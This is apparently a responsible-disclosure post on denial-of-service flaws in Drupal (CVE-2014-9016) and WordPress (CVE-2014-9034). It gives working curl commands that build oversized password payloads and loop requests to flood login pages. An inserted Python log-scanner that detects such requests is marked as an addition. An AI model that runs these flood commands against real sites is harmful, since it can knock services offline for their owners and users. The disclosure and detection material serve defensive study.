Now that enough time has passed since WordPress and Drupal released their security updates, we want to share our research. As you already know, we believe in responsible disclosure, which is why we didn't publish this post earlier.
Drupal Denial of Service CVE-2014-9016
Generate a payload and try with a non-valid user:
$ echo -n "name=NO-VALID-USER&pass=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> no_valid_user_payload
$ time curl --data @no_valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &
Generate a payload and try with a valid user:
$ echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload
$ time curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &
Perform a DoS with a valid user:
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.25; done
WordPress Denial of Service CVE-2014-9034
Generate a payload and try with a non-valid user:
$ echo -n "log=NO-VALID-USER&pwd=" > no_valid_user_payload && printf "%s" {1..1000000} >> no_valid_user_payload && echo -n "&wp-submit=Log In" >> no_valid_user_payload
$ time curl --data @no_valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &
Generate a payload and try with a valid user:
$ echo -n "log=admin&pwd=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&wp-submit=Log In" >> valid_user_payload
$ time curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &
Perform a DoS with a valid user:
$ for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/wp-login.php --silent > /dev/null &); sleep 0.25; done
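A defender-side check for the requests shown above, as an added example that is not part of the original post or the linked repository: it scans access-log lines for login POSTs whose request size is far beyond a normal login form (the commands above build a password field of roughly 5.9 MB). The nginx log format, the 8192-byte ceiling and the sample lines are assumptions constructed for this example.

```python
import re
from collections import defaultdict

# Assumed nginx log_format (not from the original post):
#   '$remote_addr [$time_local] "$request" $status $request_length $request_time'
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<req_len>\d+) (?P<req_time>[\d.]+)$'
)
# Login endpoints used in the post: wp-login.php and Drupal's ?q=user
LOGIN_RE = re.compile(r'(/wp-login\.php(\?|$)|[?&]q=user(&|$))')
MAX_LOGIN_BYTES = 8192  # assumed ceiling; $request_length includes headers and body

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 [27/Nov/2014:10:00:01 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 5889102 31.402
198.51.100.7 [27/Nov/2014:10:00:01 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 200 5889102 29.877
203.0.113.20 [27/Nov/2014:10:00:02 +0000] "POST /wordpress/wp-login.php HTTP/1.1" 302 412 0.184
198.51.100.7 [27/Nov/2014:10:00:02 +0000] "POST /drupal/?q=user HTTP/1.1" 200 5889131 27.950
203.0.113.20 [27/Nov/2014:10:00:03 +0000] "GET /drupal/?q=user HTTP/1.1" 200 310 0.052
192.0.2.44 [27/Nov/2014:10:00:04 +0000] "POST /drupal/?q=node/add HTTP/1.1" 200 20480 0.300
"""

def find_oversized_logins(log_text, max_bytes=MAX_LOGIN_BYTES):
    """Return {client_ip: {"count", "bytes", "seconds"}} for POSTs to a
    login endpoint whose request size exceeds max_bytes."""
    hits = defaultdict(lambda: {"count": 0, "bytes": 0, "seconds": 0.0})
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # line does not follow the assumed format
        if m["method"] != "POST" or not LOGIN_RE.search(m["uri"]):
            continue  # not a login submission
        size = int(m["req_len"])
        if size <= max_bytes:
            continue  # ordinary login attempt
        entry = hits[m["ip"]]
        entry["count"] += 1
        entry["bytes"] += size
        entry["seconds"] += float(m["req_time"])  # worker time tied up
    return dict(hits)

if __name__ == "__main__":
    for ip, s in find_oversized_logins(SAMPLE_LOG).items():
        print(f"{ip}: {s['count']} oversized login POSTs, "
              f"{s['bytes']} bytes, {s['seconds']:.1f}s of request time")
```

The same size ceiling can be enforced in front of the application, for example as a request body limit on the login location, so oversized passwords never reach the hashing code on unpatched installs.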
Python Code
https://github.com/c0r3dump3d/wp_drupal_timing_attack
References
http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
http://www.devconsole.info/?p=1050
https://wordpress.org/news/2014/11/wordpress-4-0-1/
https://www.drupal.org/SA-CORE-2014-006
https://www.drupal.org/node/2378367
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9034
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-9016